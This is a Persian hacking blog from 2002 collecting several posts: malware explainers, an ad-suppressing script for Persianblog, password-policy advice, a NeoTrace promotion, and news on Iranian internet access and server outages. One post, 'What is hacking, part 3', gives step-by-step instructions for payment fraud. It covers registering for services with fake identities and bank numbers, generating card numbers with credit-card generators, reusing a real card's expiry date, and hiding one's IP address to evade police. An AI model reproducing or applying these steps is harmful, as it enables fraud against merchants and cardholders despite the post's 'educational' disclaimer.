بازنمودن گزينة File را انجام مي‌دهد كه در نتيجه كاربر متوجه عمليات اضافي نخواهد شد.
- همچنين در سيستم‌عامل Dos مي‌توان توسط DOSKEY نيز ماكروهاي مخرب تعريف نمود.
Doskey a: = …
Doskey Cls = …
- يكـي از بـرنامه‌هاي مخرب ماكروهاي Wm/Cap است اين ماكرو فايل‌هاي Template (.Dot) و WordDocument
(.Doc) برنامه، Ms-Word را مورد حمله قرار مي‌دهد.
ايـن بـرنامه مخـرب داراي 9 مـاكـرو بـه نـامهاي Filetemplates , Filesaveas , Filesave , FileOpen , Fileclose ،Autoclose , Autoexec , Cap ToolsMacro , است.
اسب تروآ Trojan Horse
برنامه مخرب اسب تروآ بسيار شبيه، بمب منطقي عمل مي‌كند. نام تروآ از اسب تروآ گرفته شده است. داستان اسب تروآ به نبرد يونانيان باستان با ساكنان شهر تروآ مربوط مي‌شود از آنجايي كه اين نبرد به علت مقاومت شديد مردمان شهر، به درازا كشيده شد يونانيان مدتي پشت دروازه شهر متوقف شده و تلفات سنگيني بر آنان وارد آمد.
در آخر اسب بزرگ چوبي ساخته و سربازان جنگجو را در داخل آن پنهان نمودند و در روز بعد اهالي شهر تروآ از خواب كه بيدار شدند، اسب بزرگ چوبي را پشت دروازه شهر خود ديدند و تصور كردند كه يونانيان از نبرد خسته شده و با دادن هديه‌اي دست از محاصره شهر كشيده‌اند، اهالي شهر اسب را به داخل شهر بردند و به جشن و پايكوبي پرداختند. شب هنگام كه همه خوابيده بودند، سربازان از داخل اسب بيرون آمده، دروازه شهر را باز نموده و سربازان يوناني كه مجدداً به اطراف شهر بازگشته بودند به داخل شهر وارد شدند و شهر را تصرف نمودند.
اكنون كه به دنياي مدرن كامپيوتر باز مي‌گرديم، با مسئله مشابه‌اي مواجه مي‌گرديم.
برنامه‌هاي مخربي كه داخل برنامه‌هاي زيبايي قرار مي‌گيرند و به درون دنياي اطلاعات ما رخنه مي‌كنند و زماني كه شرايط مساعدي پيش‌آمد فعال شده و ضربه خود را وارد مي‌كنند.
براي مثال يك اسب تروآ مي‌تواند بك بازي زيبا و مهيج باشد كه پس از اجرا و مشغول‌شدن كاربر به بازي، شروع به فرمت نمودن هارد ديسك كامپيوتر مي‌كند و…
كرم Worm
برنامه‌هايي هستند كه در طول حافظه كامپيوتر (روي ديسك يا حافظه موقت) حركت كرده و اطلاعات موجود را طبق الگوي خاصي تغيير مي‌دهند براي مثال تمام صفرها را يك و بالعكس يك‌ها را صفر مي‌نمايند و اين يعني فاجعه‌اي اطلاعاتي، چرا كه تمام اطلاعات منهدم شده و ديگر قابل بازيابي نمي‌باشد.
ساختار كرم‌ها طوري است كه بر عكس ويروس‌ها، براي گسترش به برنامه ميزبان يا حامل نياز ندارند. همچنين قدرت تخريب كرم‌ها به حدي بالاست كه در طمان كوتاهي حجم بسيار زيادي از اطلاعات را از بين مي‌بردند. آنچه كه اين برنامه مخرب را وحشتناك‌تر از ويروس و … مي‌كند، عبور كٍرمها از هر مانع اطلاعاتي مانند:‌كلمه رمز (Password) و ديگر موانع و… مي‌باشد كه تا لايه‌هاي بالاي سيستم نيز مفقود نموده و اعمال تخريبي خود را انجام مي‌دهد
برای جلوگیری ازالوده سده تشتهای ان لاین را که در بعضی سایتها قراردارد به پیشنهاد ما انجام ندهید


چندسال پیش هم یکنفراین بامبول رادر اورد که با هشیاری کلاه خاکستری ها لو رفت
+ احسان شیطون ; ٥:۳٢ ‎ق.ظ ; سه‌شنبه ۱٩ آذر ،۱۳۸۱
comment نظرات ()

 

استفاده از مطالب اين سايت فقط در جهت اموزش و ارتقا سطح امنيت سيستم هاي كامپيوتري مياشد و هرگونه پيامد بعدي در نتيجه استفاده نادرست از مطالب اين سايت فقط متوجه كاربر ميباشد نه مسئولين سايت ...

نكته كه بايد قبل از توضيح در مورد حذف تبليغ سايت http://www.persianblog.ir گفته بشود اين است كه اين كد ها بسيار ساده ميباشند و توسط هر طراح وبي ميتواند پخش شود ولي اين نكته را در نظر بگيريد كه سايت مذكور به شما وبلاگ و فضاي مجاني داده است تا شما در هر ضمينه اي كه مايل بوديد استفاده كنيد و در مقابل فقط يك تبليغ كوچك در بالاي صفحه قرار داده است كه با لطف مسئولين سايت بعد از 30 ثانيه اتوماتيك بسته ميشود پس كار درستي نيست كه شما اين تبليغ كوچك را حذف كنيد ولي بد نيست كه بدانيد چطور اين كار انجام ميگيرد از روي كنجكاوي ...
كد هايي كه در زير مي بينيد را بايد در قالب وبلاگ خودتان قرار دهيد اول به سايت پرسين وبلاگ وارد شويد و بعد به قسمت ويرايش قالب برويد و در انجا دقيقا كدهاي زير را قبل از كلمه كپي كنيد و بعد قالب را ذخيره كنيد و به ولاگ خود برويد و ببينيد كه ديگر تبليغي در بالاي وبلاگ شما باز نميشود توجه كنيد اين كدها براي نوع تبليغ جديد پرشين وبلاگ ميباشد و در صورتيكه سايت مذكور تغييري در نوع تبليغ خود بدهد اين كدها كار نيمكند ...


< S C R I P T >
function ADV_dispatcher() {
if ( (AD_X1SU_mode==3) || (AD_X1SU_mode==4) ) {
}
}
< /S C R I P T >


تذكر : سايت ما هيچ مسئوليت نسبت به استفاده اشخاص بازديد كننده از اين كد ها ندارد و همانطور كه ميدانيد قرار دادن هر مطلبي در سايت براي ما مجاز ميباشد در صورتيكه با اين نوشته مشكل داريد با مسئولين سايت تماس بگيريد
+ احسان شیطون ; ٥:۳٩ ‎ق.ظ ; یکشنبه ۱٧ آذر ،۱۳۸۱
comment نظرات ()

 

مقدمه:

Account در ارتباطات مشخصاتي است كه ارا يه دهنده خدمات براي شناسايي مشتركين جهت ثبت زمان ونحوه استفاده آنها از خدمات ودر نهايت محاسبه هزينه مربوط نگهداري مي كند . در شبكه هاي محلي و سيستمهاي عامل چند كاربـره ماننـدUNIX ,XENIX , WindowsNT حساب مشابهي براي هر كاربر مجاز ثبت مي گردد و چون استفاده از چنين سيستمهايي رايگان است ، اين حسابها جهت شناسايي ،سرپرستي واهداف امنيتي نگهداري مي شوند. حساب كاربر كه معمولا توسط سرپرست سيستم ايجاد مي گردد حاوي اطلاعاتي در مورد كاربر مي باشد.، از جمله نام وي وكلمه رمز مورد نياز براي ورود به سيستم وهمچنين حقوق مربوط به دستيابي سطوح مختلف منابع در

WindowsNT ،حساب كاربر ، اطلاعاتي در مورد گروهي كه كاربر به آن تعلق دارد را نيز در خود جاي مي دهد.سياست حسابداري شما بايد چندين مورد امنيتي را در نظر بگيرد. براي مثال بايد كارهاي زير را انجام دهيد:

- - يك طول حداقل كلمه رمز را بخواهيد. هر چه كلمه رمز طولاني تر باشد، شكستن آن سخت تر است.

- اجازه كلمات رمز خالي را ندهيد. اين يعني از كاربران بخواهيد تا به جاي خالي گذاشتن فيلد كلمه رمز كاراكترهايي را به عنوان كلمه رمز وارد نماييد.

- - يك تاريخ انقضا براي كلمات رمز بگذاريد به نحوي كه بر پايه اصلي منظم تغيير يابند.

- - هنگامي كه زمان تغيير كلمه رمز يك كاربر مي رسد به او اجازه ندهيد كه درست از كلمه رمز موجودش دوباره استفاده نمايد.همچنين بايد يك پيشينه را نگهداريد تا كاربران نتوانند به سادگي ميان دو كلمه رمز تغيير دهند يك پيشينه كلمات رمز اخير را كه مورد استفاده قرار گرفته است پي گيري مي كند واچازه نمي دهد كه دوباره به كار گرفته شوند.

- - پس از كوشش ورود به سيستم عقيم مانده ، حسابها را قفل نماييد وتنها به مدير شبكه اجازه دهيد كه حسابهاي قفل شده را باز نمايد.

- - ا گر كاربران از زمان دسترسي مجازشان فراتر رفتند ،قويا ارتباطشان را قطع كنيد.

مشخصاتي كه در بالا اشاره شدند ، رهنمودهايي پيرامون تعيين سياست حسابداري كاربران بودند. ولي در اصل كاربران را مي توان به دو دسته تقسيم كرد واز اين حيث نيز بايد نحوه دستيابي آنها را به سيستم بررسي نمود.

كـاربـران دسـتـه اول آنـهـايـي هـستـنـد كـه از طريـق Logoff و دادن User Name و Password مخـصوص خـود كـه تـوسـط Administrator شبكه براي آنهاتعيين گرديده واد شبكه مي شوند و از امكانات شبكه مثل اشتراك پرينتر و اسكنر استفاده مي كـنند .اين گونه كاربران نحوه دسترسي شان از طريق پروتكلNet BEUI مي باشد كه اين پروتكل در جاي خود توضيح داده خواهد شد.

گروه ديگر كاربران آنهايي هستند كه از طريق Dial up ودادن User Name و Password كه توسط مدير شبكه و بطريقه نرم افزارAccounting نصـب شده بر روي سـرور مركز ISP بـه آنها داده مي شود بـه شبكه دسترسي پيدا كرده و از اينترنت استفاده مي كنند . اين گونه كاربران نيز از طريق پروتكلTCP/IP و تنظيمات وRAS وRRAS وNAS و DNS وIIS و DHCPبه اينترنت وصل شده واز آن استفاده مي كنند .هر يك از اين موارد در جاي خود توضيح داده خواهد شد.

قبل از بحث و بررسـي پـيرامون Account اين را بهتر ديديم تا خواننده محترم با چند اصطلاح و پروتكل شبكه آشن كنيم تا به هنگام توضيحات پيرامون نرم افزارAccounting با مشكل مواجه نشوند .ما در ابتدا به توضيحRAS وRRAS و مي پردازيم و سپس به نحوه مديريت كاربران درWindows 2000 و Linux مي پردازيم و سپس يك نرم افزار مشهورAccounting تحت عنوان ISPUtil را مورد نقد وبررسي قرار مي دهيم. (5)
+ احسان شیطون ; ۳:۳٥ ‎ق.ظ ; یکشنبه ۱٧ آذر ،۱۳۸۱
comment نظرات ()

 

عيد همه دوستان و اشنايان مبارک باشه
+ احسان شیطون ; ٥:٠٢ ‎ق.ظ ; شنبه ۱٦ آذر ،۱۳۸۱
comment نظرات ()

بابا بستنی ترکوندی

عشق های اينترنتی
تو يك چت روم شلوغ يك پسر به يك دختر PM ميزنه
y:سلام
(يك چند دقيقه اي جوابي نمي ياد)
y:خانم سرت شلوغه؟
y:خانم خوشكله چرا جواب نمي دي؟
buzz!
(اگه صفحه پشت masnegret.و حرفات جلب توجه کنه ميگن)
asl?:x
Y:مقدار سن+2يا 3 سال روش / .m/tehran
ِِِِِU:Y
BUZZ!
(اگه سنت ازش بيشتر باشه )

x:مقدار سن ـ۱يا ۲ سال كمتر/F/TEHRAN.ELAHIE (حالا خونه طرف ساوج الاغم نيست)
X:خونه شما كجاست؟
Y:(طرف براي اينكه كم نياره )درروس
AX DARI:X
Y:الان ميفرستم(عكس يك هنرپيشه كه خيلي معروف نيست مي فرسته)
اگه شانس بياره طرف صاحب عكس نشناسد
X:اين عكس خودته؟
Y:أره به جان عمم
y:تو عكس داري؟
X:نه ولي مشخصات بخواي مي دم
y:بده
X:قدم ۱۷۰ وزنم ۴۰كيلو موهام شرابي چشام سبز
(معلوم نيست دختره يا فرشته )(شايدم ۲ تا بالم داشته باشه)


------------------------------------------------------------------------------------------
بابا اين چه وضعي دروغ رو دروغ حتما بعدشم توقع دارين باهم دوست بشين
تو كه هيچكدوم مشخصاتت درست نيست؟
اصلا وقتي قرار بگزاريد تو رو از كجا بشناسه؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
به نوشته دوست عزیزم بـــــــــــــــــــم بـــــــــــــــــــــــــــــــــــــــــــــــــــستنی
+ احسان شیطون ; ٥:٠٢ ‎ق.ظ ; شنبه ۱٦ آذر ،۱۳۸۱
comment نظرات ()

 

سرور کجاست ?

ضمن تشکر ازشما گفتم شما رو با يکی از جالب توجه ترين برنامه های جاسوسی دنيا که به طور کاملا قانونی به بازار عرضه شده رو معرفی کنم ..صحبت بر سر برنامه NEO TRACE PRO است.


بعد از نصب برنامه شهر و کشور محل اقامت شما رو ازتون ميپرسه و آی پی آدرس شما و کشور شهر محل اقامت ما به عنوان مبدا در نظر گرفته ميشه . حال سوال اينه که برنامه چيکار ميکنه؟


به برنامه يک آدرس آی پي يا يک سايت اينترنتی مثل ياهو دات کام داده ميشه و تنها کاری که کاربر ميکنه بعد از اين کليک کردن روی GO است از اين لحظه برنامه شروع ميکنه به رد يابی سرور از کامپيوتر شما تا کامپيتر سرور. و اون هم به صورت گرافيکی روی کره زمين.يعنی شما دقيقا ميبينيد که از چه طريقی به سرور وصل هستين؟


مثلا سرور ياهو در جايی نزديک سنت خوزه در امريکا هست و .... بعد از پيداشدن سرور توسط برنامه تازه کار اصلی و جالب توجه شروع ميشه و اون اينه که برنامه تمام مشخصات فردی رو که سروربه اسم اون ثبت شده رو از تلفن تا آدرس خونه و آدرس ميل و...نشون ميده .


بهترين کار و جالب توجه ترين کاری که برنامه ميکنه در مورد سرورهای معروفه که برنامه يک عکس ماهواره ای از ساختمونی که سرور روی اون هست نشون ميده.بقيه چيزهاروهم مثل آدرس سرور و نشون دادن اون به صورت دقيقروی نقشه شهری و... رو ميذارو به عهده خودتون.


برنامه رو از اينجا ميتونين داون لود کنين.فقط اين چند نکته رو داشته باشين:
بعد از اينستال کردن شهر محل اقامت شما ازتون پرسيده ميشه.
جون مادرتون اگر تو ايران هستين (تهران) رو بدين و شهرهای عجيب غريب ندين و اگر خارج از ايران هستين شهری رو که توش ندگی ميکنين. اين رو برنامه برای اين ميخواد که روی نقشه گرافيکی که بالا توضيح دادم از يه جايی شروع کنه.
+ احسان شیطون ; ٧:۱۳ ‎ب.ظ ; پنجشنبه ۱٤ آذر ،۱۳۸۱
comment نظرات ()

 

هک چيست ؟ هکر کيست و چگونه ميشود هک کرد؟
قسمت سومدر اين قسمت بطور واضح تر و مستقيم تر به بررسي يکي از روشهاي هک خواهيم پرداخت .مسلما چگونگي هک کردن رو دقيقا نميشود توضيح داد! ولي با توضيحات زير و با کمي اراده و سعي شما مشکلي در اين راه نخواهد بود .Phreaken چيست؟

معني دقيق کلمه Phreaken را ميشود در يک جمله خلاصه کرد : رجيستر شدن و استفاده کردن از Paysite ها با اطلاعات غلط. يا به طور مستقيم : استفاده کردن مجاني از همه چيز!

مسلما انجام دادن همچين کاري ممنوع است ولي اطلاعات زير به وب مسترها (هم) کمک خواهد کردکه چگونه جلوي همچين کارهايي را بگيرند.!

در اينجا ما مستقيم سراغ بهترين روش استفاده ار همچين سايتهايي ميرويم:استفاده کردن با کارتهاي اعتباري! :

در همچين مواردي کاربر به صورت آنلاين شماره و مشخصات کارت اعتباري را وارد ميکند و سپس کد و رمز هاي مربوطه را براي استفاده کردن از سايت در يافت ميکند.

هکرهاي کارکشته در اينگونه موارد از پاکتهاي گمنام اينترنتي استفاده ميکنند که در راس همه بسته ( تست اينترنت با AOL) قرار دارد که در اکثر مجله هاي کامپيوتر در اروپا به طور رايگان عرضه ميشود. در اين بسته شرکت AOL 2 ماه استفاده مجاني از اينتر نت را عرضه ميکند .

تنها کاري که بايد بکنيم:

وارد کردن اسم و مشخصات خيالي

وارد کردن اسم يکي از بانکهاي معروف اروپا

وارد کردن يک عدد دلخواه ضربدر 4 به عنوان شماره حساب!

و دقيقا 2 ثانيه بعد استفاده رايگان به مدت 2 ماه از اينترنت.

مشکلي که در اين موارد ممکن است پيش آيد تست صحت وجود داشتن شماره حساب به وسيله AOL است. که پيدا کردن يک شماره حساب بانک در اينترنت و يا در روزنامه نبايد مشکلي براي ما ايجاد کند.

در اينجا بايد بغير از AOL يادي هم ازشرکت OKEY.NET کنيم که امکانات فوق را دارد!

مشکل بعدي انتخاب Paysite و بدست آوردن شماره کارت اعتباري است. که اينکار کمي مشکل تر ولي مسلما غير ممکن نخواهد بود.

معمولترين روش بدست آوردن آن استفاده از Credit Card-Generatorها است. مانند : Wizrd Credit و يا Cardpro و يا Creditmaster

مثالي تصويري از يک Credit Card-Generator

http://www.elte.hu/~kincses/konf/almere/ccard1.jpg

شايد که با رفتن به سايت http://www.metacrawler.com/ و جستجو کردن عبارت: Credit Card-Generator بتوانيد به اين برنامه ها دسترسي پيدا کنيد.

چيزي که بايد دانست: هيچ وقت نميشود آلاين امتحان کرد که آيا همچين شماره کارتي وجود خارجي دارد يا به چه کسي تعلق دارد. بنابراين شماره اي که از Credit Card-Generatorها ميگيريم را به راحتي استفاده ميکنيم ولي Credit Card-Generatorها تاريخ اعتبار کارت را نميگويند براي بدست آوردن آن چه بايد کرد؟

در اکثر برنامه هاي Credit Card-Generator از يک شماره کارت اعتباري واقعي شماره هاي شبيه سازي شده بدست مي آيد. اين کار در اينترنت تحت اصطلاح Extrapolation شناخته ميشود.شماره هاي جعلي اکثرا در رقمهاي آخري با شماره اصلي و معتبر کارت فرق دارند.

شايد تعجب کنيد اگر بشنويد : وقتي مثلا شماره کارت اعتباري خود را به Credit Card-Generatorها ميدهيد و يک شماره جعلي از آن Extrapolation ميکنيد ميتوانيد از تاريخ اعتبار کارت خود استفاده کنيد! اين کار 99% با موفقيت همراه است.

واقعا هم هيچ جاي ترسي نيست که کسي ردپاي شما را دنبال کند چون کساني که با بسته هاي گمنام AOL و ...در اينترنت هستند با بالاترين درصد گمنام بودن از اينترنت استفاده ميکنند.

براي اطمينان بيشتر از گمنام ماندن ميتوانيد سري به www.anonymizer.com بزنيد شايد در آنجا بتوانيد مثلا تولزي پيدا کنيد که آدرس آي پي شما را مخفي کند يا غير قابل تعقيب!!

ولي توجه داشته باشيد : اگر از يکي از روشهاي بالا استفاده نمي کنيد دست به همچين کاري نزنيد چون در غير اين صورت مدير سايتي که شما در آن از شماره جعلي کارت اعتباري وارد ميکنيد آدرس آي پي شما را که در سرور سايت پروتکل ميشود بدست آورده . و يک تماس با پرووايدر اينترت شما و دادن آدرس آي پي شما به پرووايدر کافي است تا پرووايدر با يک گزارش i.d.R. به پليس و اثبات اينکه شما با اين آدرس آي پي آنلاين بوديد شما را به جرم جعل کارت اعتباري روانه زندان کند.

ادامه دارد....
+ احسان شیطون ; ٧:۱۱ ‎ب.ظ ; پنجشنبه ۱٤ آذر ،۱۳۸۱
comment نظرات ()

 

به گزارش خبرنگار ITiran در حالي که هنوز چند روزي از وجود نقص در سرورهاي farahost و karahost نمی گذرد از صبح امروز سایت های دیگری که روی سرورهای جداگانه ای قرار دارند از کار افتاده اند.
بنا بر این گزارش مشهورترین سایت های از کار افتاده عبارتند از سایت ادبی هنری پندار ، سایت حامد بنایی و سایت علی پرورش که هر دوی آن ها به مسایل مربوط به کامپیوتر می پرداختند و همچنین سایت نشر علوم که به معرفی کتاب های منتشر شده توسط انتشارات نشر علوم می پرداخت.
همچنین گفته می شود که نبود دسترسی به سایت 30nama به دلیل نقص سرورآن است.
سایت پندار روی سرور datafile.net قرار دارد که توسط کمپانی infotech company اداره می شود. به گفته نیما افشار نادری مدیر سایت پندار تلاش های او برای آگاهی از چگونگی نقص در سرور و دلیل آن بی نتیجه مانده است. وی اضافه می کند که از دو روز قبل این سرور چندین بار قطع شده بود و اعتراض کاربران این سایت را برانگیخته بود.
سایت پندار که به نوعی پربیننده ترین سایت ادبی هنری فارسی زبان به شمار می آید در حالی با این مشکل دست و پنجه نرم می کند که از امروز صبح سایت حامد بنایی دات کام یکی از مشهورترین سایت های کامپیوتری فارسی و یکی از برگزیدگان مسابقه برترین وبلاگ های فارسی نیز غیر قابل دسترس است. این سایت روی سرور host4u.biz قرار دارد و به گفته حامد بنایی به دلیل پرشدن پارتیشن C سرور این مشکل به وجود آمده است. به گفته حامد بنایی حداکثر فضای اختصاص یافته به پارتیشن C این سرور 2 گیگابایت بوده است.
همچنین سایت علی پرورش دات کام نیز که به ارایه مقالاتی درباره کامپیوتر و اینترنت می پرداخت و روی همین سرور قرار داشت از کار افتاده است.گفته می شود حداقل 300 سایت ایرانی روی این سرور قرار دارند.
ایجاد مشکل برای سایت های ایرانی این روزها به یک موضوع پیچیده و بحث انگیز تبدیل شده است.ضعف سرور ، هک شدن ، خرابکاری های عمدی و بسیاری دیگر از مشکلات باعث شده که در طی دو هفته گذشته موضوع روز اینترنت در ایران به سرورهای داخلی معطوف شود. سایت ITiran نیز اخیرا و پس از یک هفته توقف از چنین مشکلی رهایی یافته است.

خبر تکميلي
سايت ادبي هنري پندار از ساعت 13 و 50 دقيقه وسايت حامد بنايي از ساعت 17 شروع به کار کرد. در همين حال خبر ديگري حاکي از ايجاد مشکل براي سايـت ايسنا است. خبر دنياي کامپيوتر و ارتباطات را بخوانيد

به نظر شما چه بايد کرد؟
+ احسان شیطون ; ٧:٥٧ ‎ق.ظ ; شنبه ٩ آذر ،۱۳۸۱
comment نظرات ()

 احمد معتمدی، وزير پست و تلگراف و تلفن ايران، اعلام کرد هم اکنون يک ميليون و هفتصدهزار نفر در ايران به اينترنت دسترسی دارند و در يک برنامه پنج ساله قرار است اين رقم به 20 ميليون نفر افزايش يابد.

آقای معتمدی روز سه شنبه 29 اکتبر در همايشی بين المللی تحت عنوان "فن آوری ارتباطات و اطلاعات" که در شيراز برگزار شد اعلام کرد روند استفاده از اينترنت بيش از پيش روبه افزايش است.

به گفته آقای معتمدی، تا کنون 850 مشترک پرظرفيت در شبکه اينترنت ايران ايجاد شده که از ميان آنها، به 252 شرکت اجازه داده شده به ارئه خدمات اينترنتی به مردم بپردازند.

آقای معتمدی از شرکت های خارجی فعال در زمينه ارتباطات و همچنين ايرانيان مقيم خارج برای سرمايه گذاری در ايران دعوت کرد.

سابقه اينترنت در ايران

آشنايی ايرانيان با پديده ای به نام "اينترنت" به حدود هشت سال پيش باز می گردد.


چند سال پيش از معرفی اينترنت به ايرانيان، کامپيوتر راه خود را به خانه ها باز کرده بود و در نتيجه زمينه مساعدی برای توسعه استفاده از اينترنت وجود داشت
اين پديده را نخستين بار يک موسسه تحقيقاتی درامور فيزيک و رياضی به جامعه ايران معرفی کرد اما اينترنت خيلی سريعتر از آنچه تصور می رفت راه خود را به داخل جامعه و درون خانه ها باز کرد.

چند سال پيش از معرفی اينترنت به ايرانيان، کامپيوتر راه خود را به خانه ها باز کرده بود و در نتيجه زمينه مساعدی برای توسعه استفاده از اينترنت وجود داشت.

اينترنت در سال های نخست ورود به ايران، بسيار پرهزينه بود(به خاطر تعداد کم کاربران و هزينه های بالای راه اندازی امکانات ارتباطی) اما به تدريج و با افزايش تعداد کاربران، هزينه دسترسی به اينترنت روبه کاهش گذاشت و اکنون شايد ايران در بين کشورهای منطقه سهل الوصول ترين امکان های ارتباطی را برای کاربران فراهم کرده است.موضوع ديگری که به توسعه سريع اينترنت در ايران کمک کرد، همزمان شدن ورود آن به ايران با تحولاتی بود که در درون جامعه ايران شروع به شکل گيری کرده بود.

ايران در دهه 1990 ميلادی آهسته آهسته از حالت بسته ای که بعد از پيروزی انقلاب در آن حاکم شده بود خارج می شد و در اين ميان، اينترنت راهی آسان را برای متصل شدن به جهان خارج فراهم کرد.

اين پديده که ابتدا در مراکز پژوهشی، دانشگاهی و اقتصادی مورد استفاده قرار گرفت، برای نخستين بار در سال 1997 رسما وارد عرصه سياسی شد.

دو رقيب اصلی انتخاباتی در انتخابات رياست جمهوری سال 1997 برای خود سايت هايی در شبکه اينترنت به راه انداخته و به تبليغات پرداختند.

البته در خارج از ايران، ايرانيان زيادی پيشتر، با راه اندازی سايت های گوناگون، استفاده های سياسی، فرهنگی و اقتصادی را از اينترنت آغاز کرده بودند.

دسترسی به اينترنت در ايران

دسترسی به اينترنت در ايران برای کاربران عادی اکنون عمدتا از طريق خط تلفن امکان پذير است و به چند طريق انجام می شود.


"کافی نت" ها نيز با وجود اينکه چند ماه قبل تعداد زيادی از آنها توسط نيروی انتظامی بسته شدند، هنوز به فعاليت در گوشه و کنار شهرهای بزرگ ادامه داده و به مردم خدمات می دهند
آسان ترين راه برای وصل شدن به اينترنت، خريد کارت های ويژه اينترنت است.

اين کارتها در واقع دربرگيرنده يک "نام کاربر" و "اسم رمز" هستند که خريدار با وارد کردن آنها به کامپيوتر خود و اتصال کامپيوتر به خط تلفن می تواند به اينترنت وصل شود.

برای استفاده از اين کارت ها نيازی به ثبت نام در شرکت ارائه دهنده خدمات يا نصب نرم افزار ويژه ای نيست و نرم افزارهايی که همراه سيستم های عامل ويندوز است، برای راه اندازی آن کفايت می کند.

اين کارت ها محدوديت زمانی دارند و در واقع يک نوع کارت اعتباری برای استفاده از اينترنت هستند.

کارت های موجود در بازار ايران از 10 ساعته به بالا هستند و مصرف کننده می تواند پس از پايان زمان خريداری شده، کارت جايگزين را از کتابفروشی ها، نرم افزار فروشی ها، دکه های روزنامه فروشی و حتی بعضی از خرازی ها خريداری کند.

قيمت اين کارت ها که ده ها نمونه از آن در بازار وجود دارد از 2500 تومان تا 5000 تومان برای 10 ساعت در نوسان است.

به بيان ديگر دسترسی به اينترنت در ايران به ازای هر ساعت 250 تومان به بالا امکان پذير است که هزينه ای ناچيز در مقابل ساير هزينه ها و قابل تامين برای اکثر طبقات شهرنشين (حداقل برای تمام کسانی که قدرت خريد يک دستگاه کامپيوتر را دارند) است.

در عين حال ويژگی ديگر اين کارت ها اين است که هويت کاربر را برملا نمی سازند و هيچ دستگاهی قادر به شناسايی کاربرانی که با استفاده از اين کارت ها وارد شبکه اينترنت می شوند نيست.

همين ويژگی به کاربران اجازه می دهد آزادانه و بدون نگرانی از عواقب بعدی، به سايت های مختلف سر بزنند (به اين شرط که آدرس توسط عرضه کنندگان خدمات قفل نشده باشد).

راه های ديگری نيز برای ورود به شبکه اينترنت وجود دارد که از جمله آنها می توان به ثبت نام در شرکت های ارائه دهنده خدمات اينترنتی اشاره کرد که روشی قديمی است و پس از معرفی کارت های اينترنتی، از تقاضا برای آن کاسته شده است.


قوه قضائيه که تا کنون بيش از 80 روزنامه و نشريه عمدتا اصلاح طلب را به اتهام هايی نظير انتشار اطلاعات محرمانه، توهين به شخصيت های سياسی مذهبی، نشر اکاذيب و مانند اينها توقيف کرده، هنوز برای رويارويی با اينترنت راه عملی نيافته است
ويژگی اين روش اين است که شرکت عرضه کننده خدمات (آی اس پی) می تواند تمام آدرس هايی را که کاربران وارد آن می شوند ثبت کند.

اين روش تا چند سال قبل تنها راه ارتباط با اينترنت بود.

روش ديگر برای استفاده از اينترنت در ايران، مثل بسياری ديگر از نقاط جهان، مراجعه به "کافی نت" هاست.

"کافی نت" ها نيز با وجود اينکه چند ماه قبل تعداد زيادی از آنها توسط نيروی انتظامی بسته شدند، هنوز به فعاليت در گوشه و کنار شهرهای بزرگ ادامه داده و به مردم خدمات می دهند.

البته کافی نت ها در ايران ابتدا بيشتر از اين لحاظ مورد توجه مردم قرار گرفتند که خدمات تلفنی ارزان قيمتی را برای مکالمه با خارج از کشور برقرار می کردند.

اين خدمت کماکان در برخی کافی نت ها ارائه می شود. اما استفاده از نامه الکترونيکی ديگر خدمتی است که به سرعت در بين مردم ايران و به ويژه برای ارتباط با خارج، گسترش يافت.

اما در عين حال، اينترنت، دسترسی آسان و سريع مردم ايران را به دنيايی از اطلاعات باز کرده است.

جستجوی يک موضوع در اينترنت به امری عادی در بين طبقات تحصيلکرده تبديل شده است.

بسياری از مردم می دانند که برای يافتن پاسخ بسياری از سوال ها، از مسايل علمی گرفته تا شرايط مهاجرت به کشورهای مختلف و مسايل سياسی می توانند به اينترنت مراجعه کنند.

تازه ترين نمونه از کاربردهای اينترنت در ايران، استفتاء های سياسی - مذهبی از علمايی است که دسترسی به آنان از شيوه معمولی (يعنی مراجعه به بيت آنها) به سادگی ممکن نيست.

آيت الله منتظری، مرجعی که سال هاست در حبس خانگی بسر می برد، از چند ماه قبل به اين سو، نوعی دفتر استفتائيه اينترنتی به راه انداخته و به سوالات مذهبی و حتی سياسی مردم در ايران و يا گوشه و کنار جهان پاسخ می دهد.


ايران اگرچه هنوز جامعه ای سنتی است، اما با توجه به جوانی جمعيت و تعداد زياد جوانان تحصيلکرده که با اينترنت آشنايی دارند، به نظر می رسد اينترنت می تواند رسانه ای تاثيرگذار در اين جامعه تلقی شود
تب اينترنت تازه در ايران شروع شده و گروه های مختلف رفته رفته راه های کاربرد اين ابزار قرن جديد را باز می يابند.

قوه قضائيه و اينترنت

قوه قضائيه که تا کنون بيش از 80 روزنامه و نشريه عمدتا اصلاح طلب را به اتهام هايی نظير انتشار اطلاعات محرمانه، توهين به شخصيت های سياسی مذهبی، نشر اکاذيب و مانند اينها توقيف کرده، هنوز برای رويارويی با اينترنت راه عملی نيافته است.

البته برخی مقام های اين قوه چند ماه قبل اعلام کردند که قانون مطبوعات را در مورد سايت های اينترنتی نيز اعمال خواهند کرد اما عملا چنين کاری صورت نگرفته است.

تا کنون تعدادی از گروه های سياسی که انتشار روزنامه های وابسته به آنها به دستور قوه قضائيه ممنوع شده، انتشار اينترنتی روزنامه را که اصطلاحا "روزنت" خوانده می شود و فعلا نيازی به دريافت مجوز ندارد، آغاز کرده اند و با سهولت به انتشار مطالب خود می پردازند.

ضريب نفوذ پيام های اينترنتی در ايران

ايران اگرچه هنوز جامعه ای سنتی است، اما با توجه به جوانی جمعيت و تعداد زياد جوانان تحصيلکرده که با اينترنت آشنايی دارند، به نظر می رسد اينترنت می تواند رسانه ای تاثيرگذار در اين جامعه تلقی شود.

با توجه به اينکه کاربران اينترنت را در ايران عمدتا افراد تحصيلکرده تشکيل می دهند و اين افراد در ميان خانواده ها و گروه ها از تاثير گذاری زيادی برخوردارند، می توان گفت که ضريب نفوذ اطلاع رسانی اينترنتی درايران بسيار بالاست و به سرعت نيز در حال افزايش است.

بسياری از خانواده ها فراگيری زبان انگليسی را که کليد راه يابی جامع تر به اينترنت است، برای فرزندان خود به عنوان يک اصل گريزناپذير درنظر می گيرند.

هم اکنون مجامعی که ايرانيان در اينترنت به وجود آورده اند از صدها مورد نيز فراتر رفته و برخی از اين گروه ها حتی با استفاده از امکانات فنی که اينترنت در اختيار آنها می گذارد (مانند گفتگو و انتقال صدا از طريق شبکه) اقدام به راه اندازی شبکه های شبه راديو در درون اينترنت کرده اند.

اين شبه راديو ها را معمولا يک نفر اداره می کند و تقريبا اکثر برنامه هايی که از طريق راديو قابل پخش است از طريق آنها به شنوندگان ارائه می شود.

